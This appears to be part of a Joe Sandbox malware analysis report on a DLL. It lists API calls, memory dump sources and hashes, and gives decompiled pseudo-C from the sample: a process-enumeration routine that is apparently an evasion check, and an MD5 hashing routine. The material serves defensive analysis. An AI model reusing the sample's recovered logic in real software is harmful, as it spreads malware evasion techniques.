                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,02F923DE,?,63699BC3,02F923DE,?,63699BC3,00000005,02F9D00C,00000008,?,02F923DE), ref: 02F94119
                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,02F923DE,?,63699BC3,02F923DE,?,63699BC3,00000005,02F9D00C,00000008,?,02F923DE), ref: 02F9414B
                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,02F923DE,?,63699BC3,02F923DE,?,63699BC3,00000005,02F9D00C,00000008,?,02F923DE), ref: 02F9417D
                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,02F923DE,?,63699BC3,02F923DE,?,63699BC3,00000005,02F9D00C,00000008,?,02F923DE), ref: 02F941AF
                                                                                                                                                                                                                                    • StrToIntExA.SHLWAPI(00000000,00000000,?,02F923DE,?,63699BC3,02F923DE,?,63699BC3,00000005,02F9D00C,00000008,?,02F923DE), ref: 02F941E1
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,02F923DE,02F923DE,?,63699BC3,02F923DE,?,63699BC3,00000005,02F9D00C,00000008,?,02F923DE), ref: 02F942D8
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
• Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
• Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
• Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                                                                                                    • Opcode ID: 3e09933c7f91899a2ea8c59cd284eede9aaca375b098b62ae354d40d26040411
                                                                                                                                                                                                                                    • Instruction ID: 8a4294a5b0c21c7c2e780c25ca482bcf0c677b3ff7066fe8ea6830096019d44b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e09933c7f91899a2ea8c59cd284eede9aaca375b098b62ae354d40d26040411
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 346186B5F10108AAFF11EBB4DD84D5BB7EDABA86C47344E15E601E3204E731E5828F24
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                    			E02F9757F() {
                                                                                                                                                                                                                                    				char _v264;
                                                                                                                                                                                                                                    				void* _v300;
                                                                                                                                                                                                                                    				int _t8;
                                                                                                                                                                                                                                    				intOrPtr _t9;
                                                                                                                                                                                                                                    				int _t15;
                                                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t15 = 0;
                                                                                                                                                                                                                                    				_t17 = CreateToolhelp32Snapshot(2, 0);
                                                                                                                                                                                                                                    				if(_t17 != 0) {
                                                                                                                                                                                                                                    					_t8 = Process32First(_t17,  &_v300);
                                                                                                                                                                                                                                    					while(_t8 != 0) {
                                                                                                                                                                                                                                    						_t9 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    						_t2 = _t9 + 0x2f9ee54; // 0x73617661
                                                                                                                                                                                                                                    						_push( &_v264);
                                                                                                                                                                                                                                    						if( *0x2f9d0fc() != 0) {
                                                                                                                                                                                                                                    							_t15 = 1;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t8 = Process32Next(_t17,  &_v300);
                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						L7:
                                                                                                                                                                                                                                    						CloseHandle(_t17);
                                                                                                                                                                                                                                    						goto L8;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				L8:
                                                                                                                                                                                                                                    				return _t15;
                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02F9758F
                                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,?), ref: 02F975A2
                                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,?), ref: 02F975CE
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02F975DD
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
• Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
• Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
• Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 420147892-0
                                                                                                                                                                                                                                    • Opcode ID: 583e991218719ce739f84295de5a76d380da4aacd8e843ec3e803813d1f70c4e
                                                                                                                                                                                                                                    • Instruction ID: 381e8a356ca8378f4e1975c18bed1a1d304216b6af758e8b72d970d5c374bcc5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 583e991218719ce739f84295de5a76d380da4aacd8e843ec3e803813d1f70c4e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55F09C72A091195BEF60B7768C48EEBB7ADDFC57D0F010051F705D3100EB24D959CA61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00401850() {
                                                                                                                                                                                                                                    				void* _t1;
                                                                                                                                                                                                                                    				long _t3;
                                                                                                                                                                                                                                    				void* _t4;
                                                                                                                                                                                                                                    				long _t5;
                                                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                                                    				intOrPtr _t8;
                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t8 =  *0x404130;
                                                                                                                                                                                                                                    				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                    				 *0x40413c = _t1;
                                                                                                                                                                                                                                    				if(_t1 == 0) {
                                                                                                                                                                                                                                    					return GetLastError();
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t3 = GetVersion();
                                                                                                                                                                                                                                    				if(_t3 != 5) {
                                                                                                                                                                                                                                    					L4:
                                                                                                                                                                                                                                    					if(_t12 <= 0) {
                                                                                                                                                                                                                                    						_t4 = 0x32;
                                                                                                                                                                                                                                    						return _t4;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						goto L5;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					if(_t3 > 0) {
                                                                                                                                                                                                                                    						L5:
                                                                                                                                                                                                                                    						 *0x40412c = _t3;
                                                                                                                                                                                                                                    						_t5 = GetCurrentProcessId();
                                                                                                                                                                                                                                    						 *0x404128 = _t5;
                                                                                                                                                                                                                                    						 *0x404130 = _t8;
                                                                                                                                                                                                                                    						_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                                                                                                                    						 *0x404124 = _t6;
                                                                                                                                                                                                                                    						if(_t6 == 0) {
                                                                                                                                                                                                                                    							 *0x404124 =  *0x404124 | 0xffffffff;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t12 = _t3 - _t3;
                                                                                                                                                                                                                                    						goto L4;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040164B,76D263F0), ref: 0040185F
                                                                                                                                                                                                                                    • GetVersion.KERNEL32 ref: 0040186E
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00401885
                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 0040189E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.512650162.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.512935351.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 845504543-0
                                                                                                                                                                                                                                    • Opcode ID: 004d01fc8ae21b5471baf428e45af9b1c9454566fc09c3eb8f0851a9344703b7
                                                                                                                                                                                                                                    • Instruction ID: 6ae184293567ded7ec2751506ec64a9140b7551cf56f667d9c7c58b5119fcc5d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 004d01fc8ae21b5471baf428e45af9b1c9454566fc09c3eb8f0851a9344703b7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40F068B16412109AE710AF787F4DB553F98E759753F004236E644F92F4D37046818B5C
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.516883219.0000000001360000.00000040.00000001.sdmp, Offset: 01360000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1360000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: t32c$t32c
                                                                                                                                                                                                                                    • API String ID: 0-1046649395
                                                                                                                                                                                                                                    • Opcode ID: 08eca26c7f0e100eb80f4c9297a799a277dedc60c587fa9126c2fdbef6415b7c
                                                                                                                                                                                                                                    • Instruction ID: 4a1470f0f3d2ff01687b955c971b95f3fe0334faa168c10c130809f3f6683016
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08eca26c7f0e100eb80f4c9297a799a277dedc60c587fa9126c2fdbef6415b7c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BAD1177690011ADFDF29DF94CD85BAAB7B9FF88318F148294E60967215D230AE85CF50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                                                    			E02F997F2(void* __ecx, intOrPtr* _a4) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                    				intOrPtr _v44;
                                                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                                                                                                    				intOrPtr _v72;
                                                                                                                                                                                                                                    				void _v76;
                                                                                                                                                                                                                                    				intOrPtr* _t226;
                                                                                                                                                                                                                                    				signed int _t229;
                                                                                                                                                                                                                                    				signed int _t231;
                                                                                                                                                                                                                                    				signed int _t233;
                                                                                                                                                                                                                                    				signed int _t235;
                                                                                                                                                                                                                                    				signed int _t237;
                                                                                                                                                                                                                                    				signed int _t239;
                                                                                                                                                                                                                                    				signed int _t241;
                                                                                                                                                                                                                                    				signed int _t243;
                                                                                                                                                                                                                                    				signed int _t245;
                                                                                                                                                                                                                                    				signed int _t247;
                                                                                                                                                                                                                                    				signed int _t249;
                                                                                                                                                                                                                                    				signed int _t251;
                                                                                                                                                                                                                                    				signed int _t253;
                                                                                                                                                                                                                                    				signed int _t255;
                                                                                                                                                                                                                                    				signed int _t257;
                                                                                                                                                                                                                                    				signed int _t259;
                                                                                                                                                                                                                                    				signed int _t274;
                                                                                                                                                                                                                                    				signed int _t337;
                                                                                                                                                                                                                                    				void* _t347;
                                                                                                                                                                                                                                    				signed int _t348;
                                                                                                                                                                                                                                    				signed int _t350;
                                                                                                                                                                                                                                    				signed int _t352;
                                                                                                                                                                                                                                    				signed int _t354;
                                                                                                                                                                                                                                    				signed int _t356;
                                                                                                                                                                                                                                    				signed int _t358;
                                                                                                                                                                                                                                    				signed int _t360;
                                                                                                                                                                                                                                    				signed int _t362;
                                                                                                                                                                                                                                    				signed int _t364;
                                                                                                                                                                                                                                    				signed int _t366;
                                                                                                                                                                                                                                    				signed int _t375;
                                                                                                                                                                                                                                    				signed int _t377;
                                                                                                                                                                                                                                    				signed int _t379;
                                                                                                                                                                                                                                    				signed int _t381;
                                                                                                                                                                                                                                    				signed int _t383;
                                                                                                                                                                                                                                    				intOrPtr* _t399;
                                                                                                                                                                                                                                    				signed int _t407;
                                                                                                                                                                                                                                    				signed int _t409;
                                                                                                                                                                                                                                    				signed int _t411;
                                                                                                                                                                                                                                    				signed int _t413;
                                                                                                                                                                                                                                    				signed int _t415;
                                                                                                                                                                                                                                    				signed int _t417;
                                                                                                                                                                                                                                    				signed int _t419;
                                                                                                                                                                                                                                    				signed int _t421;
                                                                                                                                                                                                                                    				signed int _t423;
                                                                                                                                                                                                                                    				signed int _t425;
                                                                                                                                                                                                                                    				signed int _t427;
                                                                                                                                                                                                                                    				signed int _t429;
                                                                                                                                                                                                                                    				signed int _t437;
                                                                                                                                                                                                                                    				signed int _t439;
                                                                                                                                                                                                                                    				signed int _t441;
                                                                                                                                                                                                                                    				signed int _t443;
                                                                                                                                                                                                                                    				signed int _t445;
                                                                                                                                                                                                                                    				void* _t447;
                                                                                                                                                                                                                                    				signed int _t507;
                                                                                                                                                                                                                                    				signed int _t598;
                                                                                                                                                                                                                                    				signed int _t606;
                                                                                                                                                                                                                                    				signed int _t612;
                                                                                                                                                                                                                                    				signed int _t678;
                                                                                                                                                                                                                                    				signed int* _t681;
                                                                                                                                                                                                                                    				signed int _t682;
                                                                                                                                                                                                                                    				signed int _t684;
                                                                                                                                                                                                                                    				signed int _t689;
                                                                                                                                                                                                                                    				signed int _t691;
                                                                                                                                                                                                                                    				signed int _t696;
                                                                                                                                                                                                                                    				signed int _t698;
                                                                                                                                                                                                                                    				signed int _t717;
                                                                                                                                                                                                                                    				signed int _t719;
                                                                                                                                                                                                                                    				signed int _t721;
                                                                                                                                                                                                                                    				signed int _t723;
                                                                                                                                                                                                                                    				signed int _t725;
                                                                                                                                                                                                                                    				signed int _t727;
                                                                                                                                                                                                                                    				signed int _t733;
                                                                                                                                                                                                                                    				signed int _t739;
                                                                                                                                                                                                                                    				signed int _t741;
                                                                                                                                                                                                                                    				signed int _t743;
                                                                                                                                                                                                                                    				signed int _t745;
                                                                                                                                                                                                                                    				signed int _t747;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t226 = _a4;
                                                                                                                                                                                                                                    				_t347 = __ecx + 2;
                                                                                                                                                                                                                                    				_t681 =  &_v76;
                                                                                                                                                                                                                                    				_t447 = 0x10;
                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                    					_t274 =  *(_t347 - 1) & 0x000000ff;
                                                                                                                                                                                                                                    					_t347 = _t347 + 4;
                                                                                                                                                                                                                                    					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
                                                                                                                                                                                                                                    					_t681 =  &(_t681[1]);
                                                                                                                                                                                                                                    					_t447 = _t447 - 1;
                                                                                                                                                                                                                                    				} while (_t447 != 0);
                                                                                                                                                                                                                                    				_t6 = _t226 + 4; // 0x14eb3fc3
                                                                                                                                                                                                                                    				_t682 =  *_t6;
                                                                                                                                                                                                                                    				_t7 = _t226 + 8; // 0x8d08458b
                                                                                                                                                                                                                                    				_t407 =  *_t7;
                                                                                                                                                                                                                                    				_t8 = _t226 + 0xc; // 0x56c1184c
                                                                                                                                                                                                                                    				_t348 =  *_t8;
                                                                                                                                                                                                                                    				asm("rol eax, 0x7");
                                                                                                                                                                                                                                    				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
                                                                                                                                                                                                                                    				asm("rol ecx, 0xc");
                                                                                                                                                                                                                                    				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
                                                                                                                                                                                                                                    				asm("ror edx, 0xf");
                                                                                                                                                                                                                                    				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
                                                                                                                                                                                                                                    				asm("ror esi, 0xa");
                                                                                                                                                                                                                                    				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
                                                                                                                                                                                                                                    				_v8 = _t684;
                                                                                                                                                                                                                                    				_t689 = _v8;
                                                                                                                                                                                                                                    				asm("rol eax, 0x7");
                                                                                                                                                                                                                                    				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
                                                                                                                                                                                                                                    				asm("rol ecx, 0xc");
                                                                                                                                                                                                                                    				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
                                                                                                                                                                                                                                    				asm("ror edx, 0xf");
                                                                                                                                                                                                                                    				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
                                                                                                                                                                                                                                    				asm("ror esi, 0xa");
                                                                                                                                                                                                                                    				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
                                                                                                                                                                                                                                    				_v8 = _t691;
                                                                                                                                                                                                                                    				_t696 = _v8;
                                                                                                                                                                                                                                    				asm("rol eax, 0x7");
                                                                                                                                                                                                                                    				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
                                                                                                                                                                                                                                    				asm("rol ecx, 0xc");
                                                                                                                                                                                                                                    				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
                                                                                                                                                                                                                                    				asm("ror edx, 0xf");
                                                                                                                                                                                                                                    				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
                                                                                                                                                                                                                                    				asm("ror esi, 0xa");
                                                                                                                                                                                                                                    				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
                                                                                                                                                                                                                                    				_v8 = _t698;
                                                                                                                                                                                                                                    				asm("rol eax, 0x7");
                                                                                                                                                                                                                                    				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                                                                                                                                                                                                                                    				asm("rol ecx, 0xc");
                                                                                                                                                                                                                                    				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
                                                                                                                                                                                                                                    				_t507 =  !_t356;
                                                                                                                                                                                                                                    				asm("ror edx, 0xf");
                                                                                                                                                                                                                                    				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
                                                                                                                                                                                                                                    				_v12 = _t415;
                                                                                                                                                                                                                                    				_v12 =  !_v12;
                                                                                                                                                                                                                                    				asm("ror esi, 0xa");
                                                                                                                                                                                                                                    				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
                                                                                                                                                                                                                                    				asm("rol eax, 0x5");
                                                                                                                                                                                                                                    				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
                                                                                                                                                                                                                                    				asm("rol ecx, 0x9");
                                                                                                                                                                                                                                    				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
                                                                                                                                                                                                                                    				asm("rol edx, 0xe");
                                                                                                                                                                                                                                    				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
                                                                                                                                                                                                                                    				asm("ror esi, 0xc");
                                                                                                                                                                                                                                    				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
                                                                                                                                                                                                                                    				asm("rol eax, 0x5");
                                                                                                                                                                                                                                    				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
                                                                                                                                                                                                                                    				asm("rol ecx, 0x9");
                                                                                                                                                                                                                                    				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
                                                                                                                                                                                                                                    				asm("rol edx, 0xe");
                                                                                                                                                                                                                                    				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
                                                                                                                                                                                                                                    				asm("ror esi, 0xc");
                                                                                                                                                                                                                                    				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
                                                                                                                                                                                                                                    				asm("rol eax, 0x5");
                                                                                                                                                                                                                                    				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
                                                                                                                                                                                                                                    				asm("rol ecx, 0x9");
                                                                                                                                                                                                                                    				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
                                                                                                                                                                                                                                    				asm("rol edx, 0xe");
                                                                                                                                                                                                                                    				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
                                                                                                                                                                                                                                    				asm("ror esi, 0xc");
                                                                                                                                                                                                                                    				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
                                                                                                                                                                                                                                    				asm("rol eax, 0x5");
                                                                                                                                                                                                                                    				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
                                                                                                                                                                                                                                    				asm("rol ecx, 0x9");
                                                                                                                                                                                                                                    				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
                                                                                                                                                                                                                                    				asm("rol edx, 0xe");
                                                                                                                                                                                                                                    				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
                                                                                                                                                                                                                                    				asm("ror esi, 0xc");
                                                                                                                                                                                                                                    				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
                                                                                                                                                                                                                                    				asm("rol eax, 0x4");
                                                                                                                                                                                                                                    				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
                                                                                                                                                                                                                                    				asm("rol ecx, 0xb");
                                                                                                                                                                                                                                    				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
                                                                                                                                                                                                                                    				asm("rol edx, 0x10");
                                                                                                                                                                                                                                    				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
                                                                                                                                                                                                                                    				_t598 = _t366 ^ _t425;
                                                                                                                                                                                                                                    				asm("ror esi, 0x9");
                                                                                                                                                                                                                                    				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
                                                                                                                                                                                                                                    				asm("rol eax, 0x4");
                                                                                                                                                                                                                                    				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
                                                                                                                                                                                                                                    				asm("rol edi, 0xb");
                                                                                                                                                                                                                                    				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
                                                                                                                                                                                                                                    				asm("rol edx, 0x10");
                                                                                                                                                                                                                                    				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
                                                                                                                                                                                                                                    				_t337 = _t606 ^ _t427;
                                                                                                                                                                                                                                    				asm("ror ecx, 0x9");
                                                                                                                                                                                                                                    				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
                                                                                                                                                                                                                                    				asm("rol eax, 0x4");
                                                                                                                                                                                                                                    				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
                                                                                                                                                                                                                                    				asm("rol esi, 0xb");
                                                                                                                                                                                                                                    				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
                                                                                                                                                                                                                                    				asm("rol edi, 0x10");
                                                                                                                                                                                                                                    				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
                                                                                                                                                                                                                                    				_t429 = _t733 ^ _t612;
                                                                                                                                                                                                                                    				asm("ror ecx, 0x9");
                                                                                                                                                                                                                                    				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
                                                                                                                                                                                                                                    				asm("rol eax, 0x4");
                                                                                                                                                                                                                                    				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
                                                                                                                                                                                                                                    				asm("rol edx, 0xb");
                                                                                                                                                                                                                                    				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
                                                                                                                                                                                                                                    				asm("rol esi, 0x10");
                                                                                                                                                                                                                                    				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
                                                                                                                                                                                                                                    				asm("ror ecx, 0x9");
                                                                                                                                                                                                                                    				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
                                                                                                                                                                                                                                    				asm("rol eax, 0x6");
                                                                                                                                                                                                                                    				_t253 = (( !_t437 | _t379) ^ _t739) + _v76 + _t251 - 0xbd6ddbc + _t379;
                                                                                                                                                                                                                                    				asm("rol edx, 0xa");
                                                                                                                                                                                                                                    				_t439 = (( !_t739 | _t253) ^ _t379) + _v48 + _t437 + 0x432aff97 + _t253;
                                                                                                                                                                                                                                    				asm("rol esi, 0xf");
                                                                                                                                                                                                                                    				_t741 = (( !_t379 | _t439) ^ _t253) + _v20 + _t739 - 0x546bdc59 + _t439;
                                                                                                                                                                                                                                    				asm("ror ecx, 0xb");
                                                                                                                                                                                                                                    				_t381 = (( !_t253 | _t741) ^ _t439) + _v56 + _t379 - 0x36c5fc7 + _t741;
                                                                                                                                                                                                                                    				asm("rol eax, 0x6");
                                                                                                                                                                                                                                    				_t255 = (( !_t439 | _t381) ^ _t741) + _v28 + _t253 + 0x655b59c3 + _t381;
                                                                                                                                                                                                                                    				asm("rol edx, 0xa");
                                                                                                                                                                                                                                    				_t441 = (( !_t741 | _t255) ^ _t381) + _v64 + _t439 - 0x70f3336e + _t255;
                                                                                                                                                                                                                                    				asm("rol esi, 0xf");
                                                                                                                                                                                                                                    				_t743 = (( !_t381 | _t441) ^ _t255) + _v36 + _t741 - 0x100b83 + _t441;
                                                                                                                                                                                                                                    				asm("ror ecx, 0xb");
                                                                                                                                                                                                                                    				_t383 = (( !_t255 | _t743) ^ _t441) + _v72 + _t381 - 0x7a7ba22f + _t743;
                                                                                                                                                                                                                                    				asm("rol eax, 0x6");
                                                                                                                                                                                                                                    				_t257 = (( !_t441 | _t383) ^ _t743) + _v44 + _t255 + 0x6fa87e4f + _t383;
                                                                                                                                                                                                                                    				asm("rol edx, 0xa");
                                                                                                                                                                                                                                    				_t443 = (( !_t743 | _t257) ^ _t383) + _v16 + _t441 - 0x1d31920 + _t257;
                                                                                                                                                                                                                                    				asm("rol esi, 0xf");
                                                                                                                                                                                                                                    				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
                                                                                                                                                                                                                                    				asm("ror edi, 0xb");
                                                                                                                                                                                                                                    				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
                                                                                                                                                                                                                                    				asm("rol eax, 0x6");
